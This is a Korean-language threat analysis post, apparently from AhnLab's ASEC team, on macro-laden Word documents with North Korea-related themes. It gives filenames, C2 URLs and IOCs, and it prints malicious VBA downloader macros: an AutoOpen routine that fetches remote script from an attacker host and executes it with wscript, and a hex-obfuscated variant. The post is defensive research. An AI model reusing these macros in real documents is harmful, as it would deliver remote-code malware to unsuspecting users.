ASEC 분석팀은 대북관련 내용을 포함한 악성 워드 문서가 지속적으로 유포되고 있음을 확인하였다. 확인된 워드 파일에 포함된 매크로 코드는 이전에 게시된 < ‘수출용 골드바 매매 계약서’로 위장한 악성 워드문서> 에서 확인되었던 것과 유사하다.
최근 확인된 파일명은 아래와 같다.
- 중국의 군사전략 분석 및 미래 군사전략 전망.doc (10/25 확인)
- 질의서-12월 방송.doc (10/28 확인)
- 질의서-7월 방송.docm (10/1 확인)
- KF 대양주 차세대 정책전문가 네트워크_발제안내 (2).doc (10/7 확인)
- 210813_업무연락(사이버안전).doc (8월 확인)
확인된 파일 중 다수의 워드 문서에서 파일명 또는 본문에 대북 관련 내용을 담고 있는 것이 특징이다.
[중국의 군사전략 분석 및 미래 군사전략 전망.doc]
‘중국의 군사전략 분석 및 미래 군사전략 전망.doc’에 포함된 매크로에는 아래와 같이 문서보호 해제와 관련된 코드가 존재한다. 설정된 비밀번호는 1qaz2wsx로 <대북관련 본문 내용의 External 링크를 이용한 악성 워드 문서>에 설명한 문서와 동일한 암호를 사용하여 해당 파일 역시 동일한 공격자가 제작한 것으로 추정된다.
Sub Present()
On Error Resume Next
Weed "pic", "1qaz2wsx"
For Mode = 10 To 0 Step -1
ActiveWindow.View.SeekView = Mode
With Selection
.WholeStory
.Font.Hidden = False
.Collapse
End With
Next
End Sub사용자가 워드 파일 실행 후 매크로 허용 시 AutoOpen()을 통해 악성 매크로가 자동으로 실행된다. 악성 매크로는 위의 문서 보호 해제코드 실행 후 hxxp://sarvice.medianewsonline[.]com/file/uplload/list.php?query=1 에서 추가 데이터를 받아와 1589989024.xml에 저장한다. 악성 행위를 수행하는 매크로 코드는 아래와 같다.
Sub AutoOpen()
On Error Resume Next
Present
wnd.Save
cnt = "On Error Resume Next:Set mx = CreateObject(""Microsoft.XMLHTTP""):mx.open ""GET"", ""http://sarvice.medianewsonline.com/file/uplload/list.php?query=1"", False:mx.Send:Execute(mx.responseText)"
pth = GenPlace() & "\1589989024.xml"
ResContent pth, cnt
Perform ("wscript.exe //e:vbscript //b " & pth)
End Sub[질의서-12월 방송.doc]
‘질의서-12월 방송.doc’의 경우 앞서 설명한 워드 파일의 매크로 코드보다 조금 더 난독화가 되어 있다.
Sub ytoqdggdrsetyaeorw(bret)
fn = FreeFile
ui = isqgsilwwutr("677265656e6761726465") & isqgsilwwutr("6e2e6b6b6b32342e6b722f6d6f62696c652f736b696e2f626f6172642f67616c6c6572792f6572726f722f757064617465")
rp = Environ(isqgsilwwutr("617070") & isqgsilwwutr("64617461")) & isqgsilwwutr("5c4d6963726f736f66745c4f66666963655c76657273696f6e2e") & isqgsilwwutr("786d6c")
Open rp For Output As #fn
hs = isqgsilwwutr("4f6e") & isqgsilwwutr("204572726f7220526573756d65204e6578743a536574206f7073743d4372656174654f626a65637428")
mids = isqgsilwwutr("4d53584d4c322e536572766572584d4c") & isqgsilwwutr("485454502e362e30")
hs = hs & """" & mids & """"
mids = isqgsilwwutr("293a6f7073742e6f70") & isqgsilwwutr("656e20")
hs = hs & mids & """"
mids = isqgsilwwutr("474554")
hs = hs & mids & """," & """"
mids = isqgsilwwutr("687474703a2f2f78") & isqgsilwwutr("78782f6c6973742e7068703f71756572793d31")
mids = Replace(mids, isqgsilwwutr("787878"), ui)
<생략>해당 매크로 역시 ‘중국의 군사전략 분석 및 미래 군사전략 전망.doc’와 동일한 악성 행위를 수행하며 접속하는 URL은 다음과 같다.
- hxxp://greengarden.kkk24.kr/mobile/skin/board/gallery/error/update/list.php?query=1
또한, ‘질의서-12월 방송.doc’의 워드 파일은 수집되지 않았지만 이와 유사한 파일명을 지닌 ‘질의서-7월 방송.docm’ 파일은 아래와 같이 대북 관련 내용이 존재한다.
[질의서-7월 방송.docm]
접속 URL : hxxp://sendlucky.scienceontheweb.net/ben/chads/list.php?query=1
아래는 유사 매크로 파일에서 확인한 추가 C2 주소이다.
- hxxp://smgfishing.co[.]kr/theme/basic/mobile/skin/new/basic/list.php?query=1
- hxxp://tinytalk.mygamesonline[.]org/web/fell/list.php?query=1
- hxxp://sendlucky.scienceontheweb[.]net/ben/chads/list.php?query=1
- hxxp://bipaf[.]org/bbs/zipcode/style/css/list.php?query=1
이처럼 악성 매크로를 포함한 대북 관련 워드 문서는 다양한 파일명과 내용들로 꾸준히 유포되고 있다. 해당 유형의 파일들의 경우 매크로 사용 시 실제 관련 내용을 포함하고 있어 사용자가 악성 파일 임을 인지하기 어렵기 때문에 각별한 주의가 필요하다.
현재 V3에서는 해당 악성코드를 다음과 같이 진단하고 있다.
[파일진단]
Downloader/DOC.Generic.S1649
[IOC]
- c359152a98e5fa5ac422d317a789a955
- hxxp://sarvice.medianewsonline[.]com/file/uplload/list.php?query=1
- hxxp://greengarden.kkk24.kr/mobile/skin/board/gallery/error/update/list.php?query=1
- hxxp://smgfishing.co[.]kr/theme/basic/mobile/skin/new/basic/list.php?query=1
- hxxp://tinytalk.mygamesonline[.]org/web/fell/list.php?query=1
- hxxp://sendlucky.scienceontheweb[.]net/ben/chads/list.php?query=1
- hxxp://bipaf[.]org/bbs/zipcode/style/css/list.php?query=1
연관 IOC 및 관련 상세 분석 정보는 안랩의 차세대 위협 인텔리전스 플랫폼 ‘AhnLab TIP’ 구독 서비스를 통해 확인 가능하다.
Categories:악성코드 정보
[…] 확인하였다. 워드 문서에는 악성 VBA 매크로 코드가 포함되어 있으며 <대북 관련 본문 내용 악성 워드의 지속 유포 정황 확인>에서 소개한 문서 파일과 동일한 유형으로 확인된다. 최근 유포가 […]